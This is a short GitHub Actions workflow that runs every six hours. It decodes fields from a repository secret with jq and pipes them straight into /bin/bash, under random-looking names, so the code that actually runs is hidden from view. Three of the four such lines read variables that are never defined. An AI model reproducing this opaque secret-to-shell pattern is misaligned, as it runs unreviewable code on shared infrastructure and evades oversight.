name: chengengfuzi
on:
  workflow_dispatch:
  schedule:
    - cron: '5 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chengengfuzi
        env:
          er89036: ${{ secrets.er89036 }}
        run: |
          echo $er89036 | jq -r .kxnp495 | /bin/bash
          echo $txip515 | jq -r .uo84587 | /bin/bash
          echo $yf29 | jq -r .hx223 | /bin/bash
          echo $ucvqg0 | jq -r .y49 | /bin/bash

